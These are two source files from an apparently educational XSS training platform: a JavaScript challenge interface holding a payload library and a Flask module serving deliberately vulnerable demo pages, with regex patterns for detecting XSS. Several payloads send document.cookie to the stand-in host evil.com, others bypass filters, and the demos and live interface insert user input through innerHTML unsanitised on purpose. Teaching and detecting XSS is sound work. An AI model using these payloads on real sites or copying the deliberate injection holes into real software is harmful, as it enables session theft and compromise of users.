File: app/static/js/xss-challenges.js
/**
 * XSS Challenge Interface
 * Interactive XSS demonstration and testing environment
 */

if (!window.SecureTrainer) {
    window.SecureTrainer = {};
}

SecureTrainer.XSSChallenges = {
    // XSS payload library
    payloads: {
        basic: [
            '<script>alert("XSS")</script>',
            '<img src="x" onerror="alert(\'XSS\')">',
            '<svg onload="alert(\'XSS\')">',
            'javascript:alert("XSS")',
            '<iframe src="javascript:alert(\'XSS\')"></iframe>'
        ],
        advanced: [
            '<script>fetch("/admin").then(r=>r.text()).then(d=>alert(d))</script>',
            '<img src="x" onerror="document.location=\'http://evil.com/steal?cookie=\'+document.cookie">',
            '<script>new Image().src="http://evil.com/log?"+document.cookie</script>',
            '<svg/onload="eval(atob(\'YWxlcnQoJ1hTUycpOw==\'))">',
            '<script>setTimeout(function(){alert("Delayed XSS")},2000)</script>'
        ],
        filter_bypass: [
            '<ScRiPt>alert("XSS")</ScRiPt>',
            '<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">',
            '<svg onload="window[\'ale\'+\'rt\'](\'XSS\')">',
            '<script>window["eval"]("alert(\'XSS\')")</script>',
            '<img src="javascript:alert(\'XSS\')">'
        ]
    },

    // Vulnerable application contexts
    vulnerableApps: {
        commentSystem: {
            name: "Comment System",
            description: "A vulnerable blog comment system",
            sanitization: "none",
            context: "html"
        },
        searchBox: {
            name: "Search Results",
            description: "Search results page with reflected input",
            sanitization: "basic",
            context: "attribute"
        },
        userProfile: {
            name: "User Profile",
            description: "User profile page with stored XSS",
            sanitization: "incomplete",
            context: "html"
        }
    },

    currentChallenge: null,
    challengeHistory: [],

    init() {
        this.createXSSInterface();
        this.loadVulnerableApp('commentSystem');
        this.setupEventListeners();
    },

    createXSSInterface() {
        const container = document.getElementById('challenge-workspace');
        if (!container) return;

        container.innerHTML = `
            <div class="xss-challenge-container">
                <!-- Payload Editor -->
                <div class="xss-panel">
                    <h3 class="text-lg font-semibold mb-4">XSS Payload Editor</h3>
                    <div class="mb-4">
                        <label class="block text-sm font-medium mb-2">Select Vulnerable App:</label>
                        <select id="vulnerable-app-select" class="w-full px-3 py-2 border rounded-lg">
                            <option value="commentSystem">Comment System</option>
                            <option value="searchBox">Search Box</option>
                            <option value="userProfile">User Profile</option>
                        </select>
                    </div>
                    <div class="mb-4">
                        <label class="block text-sm font-medium mb-2">XSS Payload:</label>
                        <textarea id="xss-payload" 
                                placeholder="Enter your XSS payload here..."
                                class="w-full h-32 px-3 py-2 border rounded-lg font-mono text-sm"></textarea>
                    </div>
                    <div class="flex gap-2 mb-4">
                        <button id="test-payload-btn" class="btn-primary">Test Payload</button>
                        <button id="load-example-btn" class="btn-secondary">Load Example</button>
                        <button id="clear-payload-btn" class="btn-secondary">Clear</button>
                    </div>
                    
                    <!-- Payload Library -->
                    <div class="payload-library">
                        <h4 class="font-medium mb-2">Payload Library:</h4>
                        <div class="grid grid-cols-3 gap-2 mb-4">
                            <button class="payload-category-btn" data-category="basic">Basic</button>
                            <button class="payload-category-btn" data-category="advanced">Advanced</button>
                            <button class="payload-category-btn" data-category="filter_bypass">Filter Bypass</button>
                        </div>
                        <div id="payload-list" class="max-h-32 overflow-y-auto"></div>
                    </div>
                </div>

                <!-- Vulnerable Application Simulator -->
                <div class="xss-panel">
                    <h3 class="text-lg font-semibold mb-4">Vulnerable Application</h3>
                    <div id="vulnerable-app-container" class="border rounded-lg p-4 bg-gray-50">
                        <!-- Dynamic vulnerable app content -->
                    </div>
                </div>

                <!-- Results Panel -->
                <div class="xss-panel">
                    <h3 class="text-lg font-semibold mb-4">Test Results</h3>
                    <div id="xss-results" class="border rounded-lg p-4 min-h-32">
                        <p class="text-gray-500">No tests run yet. Select a payload and click "Test Payload".</p>
                    </div>
                    <div class="mt-4">
                        <h4 class="font-medium mb-2">Challenge Progress:</h4>
                        <div class="progress-bar">
                            <div id="xss-progress" class="progress-fill" style="width: 0%"></div>
                        </div>
                        <div class="text-sm text-gray-600 mt-1">
                            <span id="xss-score">0</span> / 100 points
                        </div>
                    </div>
                </div>
            </div>
        `;
    },

    loadVulnerableApp(appType) {
        const container = document.getElementById('vulnerable-app-container');
        const app = this.vulnerableApps[appType];
        
        if (!container || !app) return;

        let appHTML = '';
        switch(appType) {
            case 'commentSystem':
                appHTML = this.createCommentSystem();
                break;
            case 'searchBox':
                appHTML = this.createSearchBox();
                break;
            case 'userProfile':
                appHTML = this.createUserProfile();
                break;
        }

        container.innerHTML = `
            <div class="vulnerable-app">
                <h4 class="font-medium mb-2">${app.name}</h4>
                <p class="text-sm text-gray-600 mb-4">${app.description}</p>
                <div class="app-content">
                    ${appHTML}
                </div>
            </div>
        `;
    },

    createCommentSystem() {
        return `
            <div class="comment-system">
                <h5 class="font-medium mb-3">Blog Comments</h5>
                <div class="existing-comments mb-4">
                    <div class="comment mb-2 p-2 bg-white rounded border">
                        <strong>Alice:</strong> Great article! Very informative.
                    </div>
                    <div class="comment mb-2 p-2 bg-white rounded border">
                        <strong>Bob:</strong> Thanks for sharing this knowledge.
                    </div>
                </div>
                <div class="add-comment">
                    <textarea id="comment-input" placeholder="Add your comment..." 
                            class="w-full p-2 border rounded mb-2"></textarea>
                    <button id="submit-comment" class="btn-primary text-sm">Post Comment</button>
                </div>
                <div id="new-comments"></div>
            </div>
        `;
    },

    createSearchBox() {
        return `
            <div class="search-system">
                <h5 class="font-medium mb-3">Product Search</h5>
                <div class="search-form mb-4">
                    <input type="text" id="search-input" placeholder="Search products..." 
                           class="w-full p-2 border rounded mb-2">
                    <button id="search-submit" class="btn-primary text-sm">Search</button>
                </div>
                <div id="search-results">
                    <p class="text-gray-500">Enter a search term above...</p>
                </div>
            </div>
        `;
    },

    createUserProfile() {
        return `
            <div class="profile-system">
                <h5 class="font-medium mb-3">User Profile</h5>
                <div class="profile-form">
                    <div class="mb-3">
                        <label class="block text-sm mb-1">Display Name:</label>
                        <input type="text" id="profile-name" placeholder="Your display name" 
                               class="w-full p-2 border rounded">
                    </div>
                    <div class="mb-3">
                        <label class="block text-sm mb-1">Bio:</label>
                        <textarea id="profile-bio" placeholder="Tell us about yourself..." 
                                class="w-full p-2 border rounded"></textarea>
                    </div>
                    <button id="update-profile" class="btn-primary text-sm">Update Profile</button>
                </div>
                <div class="profile-display mt-4 p-3 bg-white border rounded">
                    <h6 class="font-medium">Current Profile:</h6>
                    <div id="display-name">Anonymous User</div>
                    <div id="display-bio" class="text-sm text-gray-600 mt-1">No bio set</div>
                </div>
            </div>
        `;
    },

    setupEventListeners() {
        // Vulnerable app selector
        const appSelect = document.getElementById('vulnerable-app-select');
        if (appSelect) {
            appSelect.addEventListener('change', (e) => {
                this.loadVulnerableApp(e.target.value);
                this.setupAppEventListeners();
            });
        }

        // Payload editor buttons
        const testBtn = document.getElementById('test-payload-btn');
        if (testBtn) {
            testBtn.addEventListener('click', () => this.testPayload());
        }

        const loadExampleBtn = document.getElementById('load-example-btn');
        if (loadExampleBtn) {
            loadExampleBtn.addEventListener('click', () => this.loadRandomPayload());
        }

        const clearBtn = document.getElementById('clear-payload-btn');
        if (clearBtn) {
            clearBtn.addEventListener('click', () => {
                document.getElementById('xss-payload').value = '';
            });
        }

        // Payload category buttons
        document.querySelectorAll('.payload-category-btn').forEach(btn => {
            btn.addEventListener('click', (e) => {
                this.showPayloadCategory(e.target.dataset.category);
            });
        });

        this.setupAppEventListeners();
    },

    setupAppEventListeners() {
        // Comment system
        const submitComment = document.getElementById('submit-comment');
        if (submitComment) {
            submitComment.addEventListener('click', () => {
                const input = document.getElementById('comment-input');
                const newComments = document.getElementById('new-comments');
                if (input && newComments) {
                    const comment = input.value;
                    if (comment.trim()) {
                        const commentDiv = document.createElement('div');
                        commentDiv.className = 'comment mb-2 p-2 bg-yellow-50 rounded border';
                        commentDiv.innerHTML = `<strong>You:</strong> ${comment}`;
                        newComments.appendChild(commentDiv);
                        input.value = '';
                    }
                }
            });
        }

        // Search system
        const searchSubmit = document.getElementById('search-submit');
        if (searchSubmit) {
            searchSubmit.addEventListener('click', () => {
                const input = document.getElementById('search-input');
                const results = document.getElementById('search-results');
                if (input && results) {
                    const query = input.value;
                    results.innerHTML = `
                        <div class="search-result">
                            <h6>Search Results for: ${query}</h6>
                            <p class="text-sm text-gray-600">No products found matching "${query}"</p>
                        </div>
                    `;
                }
            });
        }

        // Profile system
        const updateProfile = document.getElementById('update-profile');
        if (updateProfile) {
            updateProfile.addEventListener('click', () => {
                const nameInput = document.getElementById('profile-name');
                const bioInput = document.getElementById('profile-bio');
                const displayName = document.getElementById('display-name');
                const displayBio = document.getElementById('display-bio');
                
                if (nameInput && bioInput && displayName && displayBio) {
                    displayName.innerHTML = nameInput.value || 'Anonymous User';
                    displayBio.innerHTML = bioInput.value || 'No bio set';
                }
            });
        }
    },

    showPayloadCategory(category) {
        const payloadList = document.getElementById('payload-list');
        if (!payloadList || !this.payloads[category]) return;

        const payloads = this.payloads[category];
        payloadList.innerHTML = payloads.map(payload => `
            <div class="payload-item mb-2 p-2 bg-gray-100 rounded cursor-pointer hover:bg-gray-200"
                 onclick="SecureTrainer.XSSChallenges.selectPayload('${payload.replace(/'/g, "\\'")}')">
                <code class="text-xs">${this.escapeHtml(payload)}</code>
            </div>
        `).join('');
    },

    selectPayload(payload) {
        const textarea = document.getElementById('xss-payload');
        if (textarea) {
            textarea.value = payload;
        }
    },

    loadRandomPayload() {
        const categories = Object.keys(this.payloads);
        const randomCategory = categories[Math.floor(Math.random() * categories.length)];
        const payloads = this.payloads[randomCategory];
        const randomPayload = payloads[Math.floor(Math.random() * payloads.length)];
        
        this.selectPayload(randomPayload);
    },

    testPayload() {
        const payload = document.getElementById('xss-payload').value;
        const appType = document.getElementById('vulnerable-app-select').value;
        
        if (!payload.trim()) {
            this.showResults('Error: Please enter a payload to test', 'error');
            return;
        }

        // Simulate XSS testing (safe simulation)
        const result = this.simulateXSSTest(payload, appType);
        this.showResults(result.message, result.type);
        
        if (result.type === 'success') {
            this.updateProgress(result.points);
        }
    },

    simulateXSSTest(payload, appType) {
        // Safe simulation of XSS testing
        const dangerous = ['<script', 'javascript:', 'onerror', 'onload', 'eval('];
        const hasDangerous = dangerous.some(pattern => 
            payload.toLowerCase().includes(pattern.toLowerCase())
        );

        if (!hasDangerous) {
            return {
                type: 'info',
                message: 'Payload appears safe - no dangerous patterns detected.',
                points: 5
            };
        }

        // Simulate different app responses
        const responses = {
            commentSystem: {
                message: `XSS detected! Payload would execute in comment system. The comment containing "${this.escapeHtml(payload)}" would trigger script execution when other users view the page.`,
                points: 15
            },
            searchBox: {
                message: `Reflected XSS detected! The search term "${this.escapeHtml(payload)}" would be reflected in the search results page and execute immediately.`,
                points: 10
            },
            userProfile: {
                message: `Stored XSS detected! The profile update with "${this.escapeHtml(payload)}" would be stored and execute whenever the profile is viewed.`,
                points: 20
            }
        };

        return {
            type: 'success',
            ...responses[appType]
        };
    },

    showResults(message, type) {
        const resultsContainer = document.getElementById('xss-results');
        if (!resultsContainer) return;

        const typeClasses = {
            success: 'text-green-700 bg-green-50 border-green-200',
            error: 'text-red-700 bg-red-50 border-red-200',
            info: 'text-blue-700 bg-blue-50 border-blue-200'
        };

        resultsContainer.innerHTML = `
            <div class="p-3 rounded border ${typeClasses[type] || typeClasses.info}">
                ${message}
            </div>
        `;
    },

    updateProgress(points) {
        const currentScore = parseInt(document.getElementById('xss-score').textContent) || 0;
        const newScore = Math.min(currentScore + points, 100);
        
        document.getElementById('xss-score').textContent = newScore;
        document.getElementById('xss-progress').style.width = newScore + '%';
        
        if (newScore >= 100) {
            SecureTrainer.Analytics.trackChallengeCompletion('xss', newScore);
        }
    },

    escapeHtml(text) {
        const div = document.createElement('div');
        div.textContent = text;
        return div.innerHTML;
    }
};

// Auto-initialize when challenge is loaded
document.addEventListener('DOMContentLoaded', () => {
    if (document.getElementById('challenge-workspace')) {
        SecureTrainer.XSSChallenges.init();
    }
});

File: app/routes/xss_challenges.py
"""
XSS Challenge Implementation with Sandbox Environment and Live Demonstrations
"""
from flask import Blueprint, request, jsonify, render_template_string, session
from app.models.challenge_model import get_challenge_by_id, record_challenge_attempt
from app.models.user_model import get_user_by_id
from app.routes.ai_model import calculate_dynamic_score
import html
import re
import time
import hashlib

xss_bp = Blueprint('xss_challenges', __name__)

# XSS Challenge Templates for Interactive Demos
XSS_DEMO_TEMPLATES = {
    'basic_xss': '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Vulnerable Comment System</title>
        <style>
            .demo-container { max-width: 600px; margin: 20px auto; padding: 20px; border: 1px solid #ddd; }
            .comment-box { background: #f9f9f9; padding: 15px; margin: 10px 0; border-radius: 5px; }
            .input-section { margin: 15px 0; }
            .input-section input { width: 70%; padding: 8px; margin-right: 10px; }
            .input-section button { padding: 8px 15px; background: #007bff; color: white; border: none; border-radius: 3px; cursor: pointer; }
            .warning { background: #fff3cd; padding: 10px; border-radius: 5px; margin: 10px 0; color: #856404; }
        </style>
    </head>
    <body>
        <div class="demo-container">
            <h3>Vulnerable Comment System Demo</h3>
            <div class="warning">
                ⚠️ This is a demonstration of XSS vulnerability. In a real application, this would be dangerous!
            </div>
            <div class="comment-box">
                <strong>Previous Comments:</strong>
                <div id="comments">
                    <p>User1: Great article!</p>
                    <p>User2: Very informative, thanks for sharing.</p>
                </div>
            </div>
            <div class="input-section">
                <input type="text" id="comment-input" placeholder="Enter your comment..." />
                <button onclick="addComment()">Post Comment</button>
                <button onclick="clearComments()">Clear Comments</button>
            </div>
            <div class="warning">
                Try entering: &lt;script&gt;alert('XSS')&lt;/script&gt;
            </div>
        </div>
        <script>
            function addComment() {
                const input = document.getElementById('comment-input');
                const comments = document.getElementById('comments');
                const newComment = document.createElement('p');
                // Vulnerable: Direct innerHTML assignment without sanitization
                newComment.innerHTML = 'Guest: ' + input.value;
                comments.appendChild(newComment);
                input.value = '';
            }
            
            function clearComments() {
                const comments = document.getElementById('comments');
                comments.innerHTML = '<p>User1: Great article!</p><p>User2: Very informative, thanks for sharing.</p>';
            }
        </script>
    </body>
    </html>
    ''',
    
    'reflected_xss': '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Vulnerable Search Page</title>
        <style>
            .demo-container { max-width: 600px; margin: 20px auto; padding: 20px; border: 1px solid #ddd; }
            .search-box { margin: 15px 0; }
            .search-box input { width: 70%; padding: 8px; margin-right: 10px; }
            .search-box button { padding: 8px 15px; background: #28a745; color: white; border: none; border-radius: 3px; cursor: pointer; }
            .results { background: #f8f9fa; padding: 15px; margin: 10px 0; border-radius: 5px; }
            .warning { background: #fff3cd; padding: 10px; border-radius: 5px; margin: 10px 0; color: #856404; }
        </style>
    </head>
    <body>
        <div class="demo-container">
            <h3>Vulnerable Search Demo</h3>
            <div class="warning">
                ⚠️ This demonstrates reflected XSS. The search term is reflected without proper encoding.
            </div>
            <div class="search-box">
                <input type="text" id="search-input" placeholder="Enter search term..." />
                <button onclick="performSearch()">Search</button>
            </div>
            <div class="results" id="search-results">
                <p>Enter a search term above to see results.</p>
            </div>
            <div class="warning">
                Try searching for: &lt;img src=x onerror=alert('Reflected XSS')&gt;
            </div>
        </div>
        <script>
            function performSearch() {
                const input = document.getElementById('search-input');
                const results = document.getElementById('search-results');
                const searchTerm = input.value;
                
                if (searchTerm.trim() === '') {
                    results.innerHTML = '<p>Please enter a search term.</p>';
                    return;
                }
                
                // Vulnerable: Direct reflection without encoding
                results.innerHTML = '<h4>Search Results for: ' + searchTerm + '</h4>' +
                                  '<p>No results found for "' + searchTerm + '"</p>' +
                                  '<p>Try refining your search or check the spelling.</p>';
            }
        </script>
    </body>
    </html>
    ''',
    
    'dom_xss': '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>DOM-based XSS Demo</title>
        <style>
            .demo-container { max-width: 600px; margin: 20px auto; padding: 20px; border: 1px solid #ddd; }
            .profile-section { background: #f8f9fa; padding: 15px; margin: 10px 0; border-radius: 5px; }
            .input-section { margin: 15px 0; }
            .input-section input { width: 70%; padding: 8px; margin-right: 10px; }
            .input-section button { padding: 8px 15px; background: #dc3545; color: white; border: none; border-radius: 3px; cursor: pointer; }
            .warning { background: #fff3cd; padding: 10px; border-radius: 5px; margin: 10px 0; color: #856404; }
            .url-info { background: #e9ecef; padding: 10px; border-radius: 5px; font-family: monospace; }
        </style>
    </head>
    <body>
        <div class="demo-container">
            <h3>DOM-based XSS Demo</h3>
            <div class="warning">
                ⚠️ This demonstrates DOM-based XSS where JavaScript processes URL fragments.
            </div>
            <div class="profile-section">
                <h4>User Profile</h4>
                <p>Name: <span id="user-name">Guest User</span></p>
                <p>Bio: <span id="user-bio">Loading...</span></p>
            </div>
            <div class="input-section">
                <input type="text" id="bio-input" placeholder="Enter your bio..." />
                <button onclick="updateBio()">Update Bio</button>
            </div>
            <div class="url-info">
                <strong>URL Fragment:</strong> <span id="current-fragment">#</span>
            </div>
            <div class="warning">
                Try adding to URL: #&lt;img src=x onerror=alert('DOM XSS')&gt;
            </div>
        </div>
        <script>
            function updateBio() {
                const input = document.getElementById('bio-input');
                const bioSpan = document.getElementById('user-bio');
                // Vulnerable: Direct innerHTML assignment
                bioSpan.innerHTML = input.value;
                input.value = '';
            }
            
            function processUrlFragment() {
                const fragment = window.location.hash.substring(1);
                document.getElementById('current-fragment').textContent = '#' + fragment;
                
                if (fragment) {
                    // Vulnerable: Processing URL fragment without sanitization
                    const bioSpan = document.getElementById('user-bio');
                    bioSpan.innerHTML = decodeURIComponent(fragment);
                }
            }
            
            // Process URL fragment on load and hash change
            window.onload = processUrlFragment;
            window.onhashchange = processUrlFragment;
        </script>
    </body>
    </html>
    ''',
    
    'filter_bypass': '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>XSS Filter Bypass Demo</title>
        <style>
            .demo-container { max-width: 600px; margin: 20px auto; padding: 20px; border: 1px solid #ddd; }
            .filter-info { background: #d1ecf1; padding: 15px; margin: 10px 0; border-radius: 5px; color: #0c5460; }
            .input-section { margin: 15px 0; }
            .input-section input { width: 70%; padding: 8px; margin-right: 10px; }
            .input-section button { padding: 8px 15px; background: #ffc107; color: #212529; border: none; border-radius: 3px; cursor: pointer; }
            .output { background: #f8f9fa; padding: 15px; margin: 10px 0; border-radius: 5px; min-height: 50px; }
            .warning { background: #f8d7da; padding: 10px; border-radius: 5px; margin: 10px 0; color: #721c24; }
        </style>
    </head>
    <body>
        <div class="demo-container">
            <h3>XSS Filter Bypass Demo</h3>
            <div class="filter-info">
                🔒 Basic XSS Filter Active: Removes &lt;script&gt; tags and "javascript:" protocol
            </div>
            <div class="input-section">
                <input type="text" id="payload-input" placeholder="Enter your payload..." />
                <button onclick="testPayload()">Test Payload</button>
            </div>
            <div class="output" id="output">
                <em>Enter a payload above to test against the filter</em>
            </div>
            <div class="warning">
                Try bypassing with: &lt;svg onload=alert('Bypassed!')&gt; or &lt;img src=x onerror=alert(1)&gt;
            </div>
        </div>
        <script>
            function basicXSSFilter(input) {
                // Simple filter that removes script tags and javascript: protocol
                let filtered = input.replace(/<script[^>]*>.*?<\\/script>/gi, '[BLOCKED]');
                filtered = filtered.replace(/javascript:/gi, '[BLOCKED]');
                filtered = filtered.replace(/on\\w+\\s*=/gi, function(match) {
                    // Allow some but not all event handlers (simulating weak filter)
                    if (match.toLowerCase().includes('onload') || 
                        match.toLowerCase().includes('onerror')) {
                        return match; // Bypass: filter misses these
                    }
                    return '[BLOCKED]';
                });
                return filtered;
            }
            
            function testPayload() {
                const input = document.getElementById('payload-input');
                const output = document.getElementById('output');
                const originalPayload = input.value;
                
                if (!originalPayload.trim()) {
                    output.innerHTML = '<em>Please enter a payload</em>';
                    return;
                }
                
                // Apply basic filter
                const filteredPayload = basicXSSFilter(originalPayload);
                
                // Show filtering result
                output.innerHTML = '<strong>Original:</strong> ' + 
                                 '<code>' + originalPayload.replace(/</g, '&lt;').replace(/>/g, '&gt;') + '</code><br>' +
                                 '<strong>After Filter:</strong> ' + 
                                 '<code>' + filteredPayload.replace(/</g, '&lt;').replace(/>/g, '&gt;') + '</code><br>' +
                                 '<strong>Rendered Output:</strong><br>' +
                                 '<div style="border: 1px solid #ccc; padding: 10px; margin: 5px 0;">' + 
                                 filteredPayload + '</div>';
            }
        </script>
    </body>
    </html>
    '''
}


@xss_bp.route('/demo/<demo_type>', methods=['GET'])
def get_xss_demo(demo_type):
    """Get interactive XSS demonstration."""
    try:
        if demo_type not in XSS_DEMO_TEMPLATES:
            return jsonify({
                'success': False,
                'error': 'Demo type not found'
            }), 404
        
        demo_html = XSS_DEMO_TEMPLATES[demo_type]
        
        return jsonify({
            'success': True,
            'demo_type': demo_type,
            'demo_html': demo_html,
            'description': get_demo_description(demo_type)
        }), 200
        
    except Exception as e:
        print(f"Error getting XSS demo: {e}")
        return jsonify({
            'success': False,
            'error': 'Failed to load demo'
        }), 500


@xss_bp.route('/sandbox/validate', methods=['POST'])
def validate_xss_payload():
    """Validate XSS payload in a safe sandbox environment."""
    try:
        data = request.json
        payload = data.get('payload', '')
        challenge_id = data.get('challenge_id')
        user_id = data.get('user_id')
        
        if not payload or not challenge_id or not user_id:
            return jsonify({
                'success': False,
                'error': 'Missing required parameters'
            }), 400
        
        # Get challenge and user
        challenge = get_challenge_by_id(challenge_id)
        user = get_user_by_id(user_id)
        
        if not challenge or not user:
            return jsonify({
                'success': False,
                'error': 'Challenge or user not found'
            }), 404
        
        # Validate XSS payload
        validation_result = validate_xss_payload_safely(payload, challenge)
        
        # Record attempt
        completion_time = time.time() - session.get(f'challenge_{challenge_id}_start_time', time.time())
        hints_used = session.get(f'challenge_{challenge_id}_hints_used', 0)
        
        score_earned = 0
        if validation_result['is_valid']:
            score_earned = calculate_dynamic_score(
                user, challenge, completion_time, hints_used, 1
            )
        
        # Record the attempt
        record_challenge_attempt(
            user_id, challenge_id, payload,
            validation_result['is_valid'], completion_time, hints_used
        )
        
        return jsonify({
            'success': True,
            'validation_result': validation_result,
            'score_earned': score_earned
        }), 200
        
    except Exception as e:
        print(f"Error validating XSS payload: {e}")
        return jsonify({
            'success': False,
            'error': 'Validation failed'
        }), 500


@xss_bp.route('/challenges', methods=['GET'])
def get_xss_challenges():
    """Get available XSS challenges."""
    try:
        from app.models.challenge_model import get_xss_challenges as get_challenges
        
        challenges = get_challenges()
        
        # Add demo links to challenges
        for challenge in challenges:
            challenge['demo_available'] = challenge.get('interactive_demo', False)
            if challenge['demo_available']:
                demo_type = get_demo_type_for_challenge(challenge)
                challenge['demo_url'] = f"/api/xss/demo/{demo_type}"
        
        return jsonify({
            'success': True,
            'challenges': challenges
        }), 200
        
    except Exception as e:
        print(f"Error getting XSS challenges: {e}")
        return jsonify({
            'success': False,
            'error': 'Failed to get challenges'
        }), 500


def validate_xss_payload_safely(payload, challenge):
    """Safely validate XSS payload without executing it."""
    validation_result = {
        'is_valid': False,
        'feedback': '',
        'detected_techniques': [],
        'risk_level': 'low'
    }
    
    # XSS pattern detection
    xss_patterns = [
        (r'<script[^>]*>.*?</script>', 'Script tag injection', 'high'),
        (r'<.*?on\w+\s*=.*?>', 'Event handler injection', 'high'),
        (r'javascript:', 'JavaScript protocol', 'medium'),
        (r'<iframe[^>]*>', 'Iframe injection', 'high'),
        (r'<object[^>]*>', 'Object tag injection', 'medium'),
        (r'<embed[^>]*>', 'Embed tag injection', 'medium'),
        (r'<svg[^>]*onload.*?>', 'SVG with onload', 'high'),
        (r'<img[^>]*onerror.*?>', 'Image with onerror', 'high'),
        (r'<.*?href\s*=\s*["\']?javascript:', 'JavaScript href', 'medium'),
        (r'<.*?src\s*=\s*["\']?javascript:', 'JavaScript src', 'medium'),
        (r'vbscript:', 'VBScript protocol', 'medium'),
        (r'data:.*?base64', 'Data URI with base64', 'medium')
    ]
    
    detected_techniques = []
    max_risk = 'low'
    
    for pattern, technique, risk in xss_patterns:
        if re.search(pattern, payload, re.IGNORECASE):
            detected_techniques.append({
                'technique': technique,
                'risk_level': risk
            })
            if risk == 'high':
                max_risk = 'high'
            elif risk == 'medium' and max_risk != 'high':
                max_risk = 'medium'
    
    validation_result['detected_techniques'] = detected_techniques
    validation_result['risk_level'] = max_risk
    
    # Check against expected solutions
    expected_solutions = challenge.get('expected_solutions', [])
    challenge_type = challenge.get('type', '')
    
    if challenge_type == 'xss' and detected_techniques:
        # Check if detected techniques match expected solutions
        for expected in expected_solutions:
            if expected.lower() in payload.lower():
                validation_result['is_valid'] = True
                validation_result['feedback'] = f"Correct! Detected {technique} technique."
                break
        
        if not validation_result['is_valid'] and detected_techniques:
            validation_result['is_valid'] = True
            validation_result['feedback'] = f"Good! Detected XSS techniques: {', '.join([t['technique'] for t in detected_techniques])}"
    
    if not validation_result['is_valid']:
        validation_result['feedback'] = "No XSS techniques detected. Try using HTML tags with JavaScript event handlers."
    
    return validation_result


def get_demo_description(demo_type):
    """Get description for demo type."""
    descriptions = {
        'basic_xss': 'Demonstrates basic stored XSS in a comment system with no input validation.',
        'reflected_xss': 'Shows reflected XSS where user input is immediately displayed on the page.',
        'dom_xss': 'Illustrates DOM-based XSS using URL fragments and client-side JavaScript.',
        'filter_bypass': 'Tests ability to bypass basic XSS filters using alternative injection methods.'
    }
    return descriptions.get(demo_type, 'XSS demonstration')


def get_demo_type_for_challenge(challenge):
    """Map challenge to appropriate demo type."""
    challenge_id = challenge.get('id', '')
    
    if 'dom' in challenge_id.lower():
        return 'dom_xss'
    elif 'filter' in challenge_id.lower() or 'bypass' in challenge_id.lower():
        return 'filter_bypass'
    elif 'reflected' in challenge_id.lower():
        return 'reflected_xss'
    else:
        return 'basic_xss'